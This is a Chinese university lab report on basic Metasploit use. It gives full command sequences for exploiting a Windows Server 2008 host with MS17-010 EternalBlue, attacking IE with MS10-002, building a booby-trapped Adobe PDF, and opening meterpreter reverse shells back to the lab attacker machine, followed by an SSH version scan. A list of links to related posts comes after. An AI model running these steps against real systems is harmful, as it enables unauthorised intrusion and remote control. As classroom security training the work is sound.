2018-2019-2 20165205 《网络对抗》 Exp5 MSF基础
2018-2019-2 20165205 《网络对抗》 Exp5 MSF基础
实验内容
本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:
1.1一个主动攻击实践,完成ms17-010-eternalblue
(成功); (1分)
1.2 一个针对浏览器的攻击,完成ms10_002
(成功);(1分)
1.3 一个针对客户端的攻击,如Adobe
(成功);(1分)
1.4 成功应用任何一个辅助模块:scanner/ssh/ssh_verision
(成功且唯一)。(0.5分)
1.5 报告评分(1分)
基础问题回答
用自己的话解释什么是exploit,payload,encode.
- exploit:利用msf中选择的模块,payload以及攻击对象的信息对目标机的漏洞进行攻击的过程。
- payload:当我们选择利用某一个漏洞进行攻击时,需要选择一个payload,可以说是选择一种代码,或者说是对这个漏洞的攻击方式。
- encode:对payload进行编码,降低被查出的风险。
实践过程记录
1.一个主动攻击实践,完成ms17_010-eternalblue
永恒之蓝攻击
- 攻击机:kali IP:10.1.1.216
- 靶机:windows XP系列:全都没有成功
靶机:windows server 2008(中文) IP:10.1.1.166
步骤如下
先对靶机进行漏洞扫描
nmap -script vnlu 10.1.1.166
可以看到win server 2008系统没有ms08漏洞,但是有ms17_010漏洞search ms17_010
查找相关模块- 使用
exploit/windows/smb/ms17_010_eternalblue
- 输入
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
设置payloadset rhost 10.1.1.166
填写靶机IPset lhost 10.1.1.216
填写攻击机IPset lport 5205
填写攻击机端口号run
开始攻击攻击成功可以看到
session 1 opened
- 输入
shell
可以得到命令行 可以通过
dir
查看windows/system32
下的文件
2.一个针对浏览器的攻击,完成ms10_002
- 攻击机:kali IP:10.1.1.216
- 靶机:windows XP SP3(中文) IP:10.1.1.235
- 这个漏洞需要靶机访问攻击机的网站IE浏览器的版本需要是7及7以下
set lhost 10.1.1.216
设置攻击机IPset srvport 80
set lport 443
设置端口
- 然后exploit就可以等待了
打开XP的IE浏览器,访问
http://10.1.1.216:80
这是攻击机可以看到会话已经建立了
sessions
先看一下会话号session -i 4
这里的数字是会话号,需要提前查,只有在浏览器还开着的时候才能打开对话,要抓紧时间得到shell
shell
之后,这次我用的是net start
查看功能
3.一个针对客户端的攻击,如Adobe
- 攻击机:kali IP:10.1.1.216
- 靶机:windows XP SP3(中文) IP:10.1.1.235 adobereader9
use exploit/windows/fileformat/adobe_cooltype_sing
使用这个模块set payload windows/meterpreter/reverse_tcp
使用这个payloadset lhost 10.1.1.216
设置攻击IPset FILENAME 20165205.pdf
设置攻击文件的名称exploit
即可产生攻击文件- 将文件移动到XP里
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.1.1.216
set lport 5205
exploit
- 以上都是十分熟悉的步骤
- 之后打开pdf文件,kali就攻击成功了
得到shell后就可以操作一番了
4.成功应用任何一个辅助模块:scanner/ssh/ssh_verision
use auxiliary/scanner/ssh/ssh_version
辅助模块的scanner下的功能基本都是扫描功能的,这个模块的功能是扫描ssh的版本set rhosts 10.1.1.0/24
扫描10.1.1网段的所有子网- run或者exploit之后需要等待
- 最后扫描到的是kali的ssh版本号hhhhh
实验中遇到的问题
- 问题:做ms08攻击时,遇到no session的问题
解决方法:可能是操作系统版本的问题,我在之后换靶机的时候回先用nmap扫描一下版本漏洞在攻击。 - 在auxiliary的辅助模块中很多都读不懂,选择了比较简单的scanner模块,但是其他模块还是有很多的,希望以后可以用到
实践总结与体会
- 实践中遇到很多次攻击后发现攻击没有成果,去找原因的时候发现是系统打过补丁或者是软件版本较高漏洞被修补,所以以后再做时要先扫描漏洞,而不是盲目地直接攻击。
- 每一个攻击模块都可以查看options,写yes都是需要填写的
离实战还缺什么技术和步骤
我们现在的操作都要求漏洞是没有被打过补丁或者没有更新过的,但是现实我们现在用的软件,系统都是没有这些很明显的漏洞的,我们的利用的漏洞都是被人发现过的,也就是说是被破解的,我们现实中想要攻击还需要自己去发现漏洞才行。
2018-2019-2 20165205 《网络对抗》 Exp5 MSF基础的更多相关文章
- 2018-2019 20165237网络对抗 Exp5 MSF基础应用
2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...
- 2018-2019 20165221 网络对抗 Exp5 MSF基础
2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms0 ...
- 2018-2019 20165235 网络对抗 Exp5 MSF基础
2018-2019 20165235 网络对抗 Exp5 MSF基础 1. 实践内容(3.5分) 1.1一个主动攻击实践 攻击方:kali 192.168.21.130 靶机: win7 192.16 ...
- 2018-2019 20165220 网络对抗 Exp5 MSF基础
实验任务 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms11_050:(1分) 1.3 一个针对客户端的攻击,如Adobe:(1分) 1.4 成功应用任何 ...
- 2018-2019 20165219 网络对抗 Exp5 MSF基础
实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms ...
- 20145338 《网络对抗》 MSF基础应用
20145338<网络对抗> MSF基础应用 实验内容 ·掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路. 具体需要完成(1)一个主动攻击;(2)一个针对浏览器的攻击 ...
- 20145308 《网络对抗》 MSF基础应用 学习总结
20145308 <网络对抗> MSF基础应用 学习总结 实验内容 掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路.具体需要完成(1)一个主动攻击,如ms08_067 ...
- 20145326蔡馨熤《网络对抗》——MSF基础应用
20145326蔡馨熤<网络对抗>——MSF基础应用 实验后回答问题 用自己的话解释什么是exploit,payload,encode. exploit:起运输的作用,将数据传输到对方主机 ...
- 20155218《网络对抗》MSF基础应用
20155218<网络对抗>MSF基础应用 实验过程 1.一个主动攻击实践,如ms08_067; 首先使用 search ms08_067查询一下该漏洞: show target 查看可以 ...
- 20155304《网络对抗》MSF基础应用
20155304<网络对抗>MSF基础应用 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如ms08_ ...
随机推荐
- 组件_ UIToolbar
组件_ UIToolbar /** 1. 顶部toolbar 2. TextField可以以UIBarButtonItem的自定义视图的方式加入toolbar 3. 三个按钮 4. 将UIBarBu ...
- 简述iproute家族命令
ifconfig 是用来查看.配置.启用或禁用网络接口的工具.可以用这个工具来临时配置网卡的IP地址.掩码.广播地址.网关等. 语法 ifconfig [interface] 参数 up 启动指定网络 ...
- (转)python中函数参数中如果带有默认参数list的特殊情况
在python中函数参数中如果带有默认参数list遇到问题 先看一段代码 1 2 3 4 5 6 7 8 9 def f(x,l=[]): for i in range(x): ...
- Ex0203
游戏 – 这些软件的开发者是怎么说服你(陌生人)成为他们的用户的?他们的目标都是盈利么?他们的目标都是赚取用户的现金么?还是别的? 朋友们都在玩,我在试玩的时候也觉得很不错:游戏基本上的目标都 ...
- VUE路由携带参数的三种方式
vue 通过路由在进行页面跳转时,会经常携带参数用于同步页面间的数据 路由中携带参数的方式总结如下: 路由定义示例: { name: 'list', path: '/list', component: ...
- jumpserver管理入门
比较规范一点的步骤 1.先在用户管理查看用户组里,添加用户组 2.在用户管理查看用户里,添加用户 3.在资产管理里查看资产,添加资产.在批量增加那里可以使用表格快速导入添加 4.在授权管理里的系统用户 ...
- bond-vlan-bridge
拓扑介绍 Eth-Trunk5 down down 0% 0% 0 0 10GE1/0/5 down down 0.01% 0.01% 0 0 10GE2/0/5 down down 0.01% 0% ...
- 【python】python打包生成的exe文件运行时提示缺少模块
事情是这样的我用打包命令:pyinstaller -F E:\python\clpicdownload\mypython.py打包了一个exe程序,但是运行时提示我缺 少bs4模块然后我就去查pyin ...
- 拓展abaqus python 模块
abaqus python 本身自带一些模块: 在安装路径:\\SIMULIA\Abaqus\6.14-1\tools\SMApy\python2.7\Lib\site-packages和另外一个2. ...
- 代码漏洞扫描描述Cross Site History Manipulation解决办法[dongcoder.com]
代码漏洞扫描 漏洞描述:Cross Site History Manipulation 简要描述:产品的行为差异或发送不同的反应,在某种程度上暴露了与安全性相关的产品状态,例如特定的操作是否成功.可能 ...